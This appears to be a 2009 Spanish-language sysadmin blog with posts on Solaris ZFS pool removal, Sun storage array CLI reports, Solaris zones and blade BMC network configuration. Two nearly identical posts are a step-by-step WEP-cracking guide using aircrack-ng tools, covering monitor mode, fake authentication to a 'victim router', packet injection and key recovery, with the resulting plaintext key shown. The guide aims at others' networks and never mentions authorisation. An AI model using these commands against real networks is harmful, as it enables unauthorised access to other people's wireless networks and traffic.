miércoles, 7 de octubre de 2009

Validar volumenes en zfs - desmontarlo y destruirlo

zpool -h //Muestra los parametros que acompañan al comando zpool

root@masterserver2 # zpool list //Lista los pool zfs actualmente creados
NAME SIZE USED AVAIL CAP HEALTH ALTROOT
backup_pva 3.17T 325M 3.17T 0% ONLINE -
storage0 527G 142G 385G 26% ONLINE -


root@masterserver2 # zpool status backup_pva //Lista los discos que se encuentran atachados al un pool zfs Ej: backup_pva
pool: storage0
state: ONLINE
scrub: none requested
config:

NAME STATE READ WRITE CKSUM
backup_pva ONLINE 0 0 0
c3t600A0B800011EF78000079F34832C463d0s0 ONLINE 0 0 0
c3t600A0B800011EE120000A45C4958A7D8d0s2 ONLINE 0 0 0
c3t600A0B800011EE120000A577496DE26Ad0s0 ONLINE 0 0 0

zfs unmount -f backup_pva/pva //Desmontamos el volumen fisico zfs

zfs destroy -r backup_pva //Destruimos el volumen zfs

zpool destroy -r backup_pva //Destruimos el Pool zfs

viernes, 4 de septiembre de 2009

Como generar reporte de status (alarmas, estadisticas) del arreglo 6540

//Primero nos logueamos en la maquina que contiene el CAM:
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX

//Identificamos cual array es al que queremos generar el reporte: escogemos el stk6540-01
root@masterserver # sscs list array
Array: arregloremoto-stk6140-01
Array: arreglolocal-stk6140-01
Array: stk6540-01
Array: ARRAY01
Array: ARRAY02

//Aplicamos el siguiente comando:
root@masterserver # /opt/SUNWsefms/bin/supportData -d stk6540-01 -p /export/home/usuario -o supporData_stk6540-01
Starting the collection process for stk6540-01
Starting data collection
Collecting the array profile...
Collecting the MEL data...
Collecting the RLS data...
Collecting persistant registrations...
Collecting bad block data...
Collecting the drive log data...
Collecting the object bundle...
Collecting the alarm data...
Collecting the state capture...
Collecting the NVSRAM data...
Collecting the volume statistics...
Collecting the SOC data...
Zipping up the data files
Completion Status: Task completed succesfully.

La siguiente es la sintaxis de comando:
//The "supportData" utility is in the directory /opt/SUNWsefms/bin/
//The syntax to run the "supportData" utility is :
//
//supportData -d -p -o
//
//Valid identifiers are the or or or
//
//where :
//
// is the internal Array Serial Number
// is the Name of the Array assigned in Configuration Service
// is the ip address of either the A or B controller
// is the fully qualified DNS name of either the A or B controller or the management host
//
//and :
//
// is the location where you want the output written, e.g. /tmp
// is the output file to be created.
//
//The output file will be in a zip format.

miércoles, 2 de septiembre de 2009

CLI - Reporte volumenes array 6540

//Primero logearse en la maquina bksrv01
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX

//Sequimos con el comando que indica con que array queremos trabajar, con cual virtual disk y que nos de una relacion de los volumenes y las caracteristicas del virtual disk.
root@masterserver # sscs list --array stk6540-01 vdisk 1
Virtual Disk: 1
Status: Optimal
State: Ready
Number of Disks: 10
RAID Level: 1
Total Capacity: 681.135 GB
Configured Capacity: 594.000 GB
Available Capacity: 87.135 GB
Array Name: stk6540-01
Array Type: 6540
Disk Type: Fibre Channel
Maximal Volume Size: 3.129 GB
Associated Disks:
Disk: t0d05
Disk: t0d04
Disk: t0d03
Disk: t0d02
Disk: t0d01
Disk: t1d01
Disk: t1d02
Disk: t1d03
Disk: t1d04
Disk: t1d05
Associated Volumes:
Volume: heo_01_v4901_ora_datos
Volume: heo_01_v4901_ora_indices
Volume: heo_01_v4902
Volume: heo_01_v4902_ora_datos
Volume: heo_01_v4904
Volume: stk5320-01-H0_ndmp
Volume: stk5320-01-H1_ndmp

viernes, 31 de julio de 2009

Creación de Zonas - Solaris

create -b
set zonepath=/zonas/CT1BOZSUNOAS-SPE4
set autoboot=true
set ip-type=exclusive

add net
set physical=nxge1
set physical=nxge2
end

verify
commit

miércoles, 29 de julio de 2009

Como hackear clave WEP en red inalambrica - Wifislax

1.Descargar el cd de wifislax 3.1 desde http://download.wifislax.com:8080/wifislax-3.1.iso. Boot el equipo por cd. En el momento que ya haya terminado de cargar el OS, para cargar el escritorio grafico, colocar como login "root" y password "toor", y finalmente "startx". Seguidamente se debe configurar la interfaz de red como monitor sobre el canal en el que se encuentre el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.

3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision


#iwconfig wifi0 rate 1M


4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0


donde aaaa puede ser cualquier archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax


En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6


5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida


6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:


#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.

7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap


Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.

Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:

….

Equivalente en ASCII: LADINO4763356

Como hackear clave WEP en red inalambrica - Wifislax

1. Configurar la interfaz de red en modo "Monitor" sobre el canal en el que se encuentra el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.

3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.

#iwconfig wifi0 rate 1M

4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0

donde aaaa puede ser cualquier nombre para este archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax

En este ejemplo encontramos una ESSID:LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6

5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida

6. Ahora empezaremos a intectar paquetes usando el siguiente comando:

#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0

Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.


7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap

Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.

.....

Equivalente en ASCII: LADINO4763356



Congratulations!!! Clave detectada!!!

lunes, 27 de julio de 2009

Configuracion Interfaz BMC Sun Blade 6250

//Este es un ejemplo aplicado a la BL9 del chasis 1

-> set /CH/BL9/SP/network pendingipaddress=172.28.236.29
-> set /CH/BL9/SP/network pendingipdiscovery=static
-> set /CH/BL9/SP/network pendingipgateway=172.28.239.254
-> set /CH/BL9/SP/network pendingipnetmask=255.255.252.0
-> set /CH/BL9/SP/network commitpending=true

//Muestra la configuracion de Red para esa blade
-> show /CH/BL9/SP/network